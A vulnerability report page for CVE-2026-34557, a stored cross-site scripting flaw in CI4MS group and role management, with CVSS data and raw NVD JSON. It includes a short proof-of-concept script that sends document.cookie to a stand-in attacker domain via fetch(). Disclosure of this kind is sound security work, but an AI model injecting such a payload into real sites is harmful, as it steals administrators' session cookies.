Security Vulnerability Report
CVE-2026-34557 CVSS 9.1 CRITICAL

CVE-2026-34557

Published: 2026-03-30 21:17:10
Last Modified: 2026-04-06 16:53:19

Description

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within group and role management functionality. Multiple input fields (three distinct group-related fields) can be injected with malicious JavaScript payloads, which are then stored server-side. These stored payloads are later rendered unsafely within privileged administrative views without proper output encoding, leading to stored cross-site scripting (XSS) within the role and permission management context. This issue has been patched in version 0.31.0.0.

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:ci4-cms-erp:ci4ms:*:*:*:*:*:*:*:* - VULNERABLE
CI4MS < 0.31.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- Stored XSS PoC for CI4MS Group/Role Management -->
<!-- Inject this payload into the vulnerable group name or description fields -->
<script>
  // Example: Send current session cookies to an external server controlled by the attacker
  fetch('https://attacker-controlled-domain.com/steal?cookie=' + encodeURIComponent(document.cookie))
    .then(response => console.log('Exfiltrated'))
    .catch(error => console.error('Error:', error));
</script>

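References

https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-rpjr-985c-qhvm (Exploit, Mitigation, Vendor Advisory)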

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34557", "sourceIdentifier": "[email protected]", "published": "2026-03-30T21:17:10.323", "lastModified": "2026-04-06T16:53:19.183", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within group and role management functionality. Multiple input fields (three distinct group-related fields) can be injected with malicious JavaScript payloads, which are then stored server-side. These stored payloads are later rendered unsafely within privileged administrative views without proper output encoding, leading to stored cross-site scripting (XSS) within the role and permission management context. This issue has been patched in version 0.31.0.0."}, {"lang": "es", "value": "CI4MS es un esqueleto de CMS basado en CodeIgniter 4 que ofrece una arquitectura modular lista para producción con autorización RBAC y soporte de temas. Antes de la versión 0.31.0.0, la aplicación no logra sanitizar correctamente la entrada controlada por el usuario dentro de la funcionalidad de gestión de grupos y roles. Múltiples campos de entrada (tres campos distintos relacionados con grupos) pueden ser inyectados con cargas útiles de JavaScript maliciosas, las cuales son luego almacenadas en el servidor. Estas cargas útiles almacenadas son luego renderizadas de forma insegura dentro de vistas administrativas privilegiadas sin una codificación de salida adecuada, lo que lleva a cross-site scripting (XSS) almacenado dentro del contexto de gestión de roles y permisos. Este problema ha sido parcheado en la versión 0.31.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 5.3}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ci4-cms-erp:ci4ms:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.31.0.0", "matchCriteriaId": "805F6B8A-9324-4CA4-BADE-439CC15DA14C"}]}]}], "references": [{"url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-rpjr-985c-qhvm", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-rpjr-985c-qhvm", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}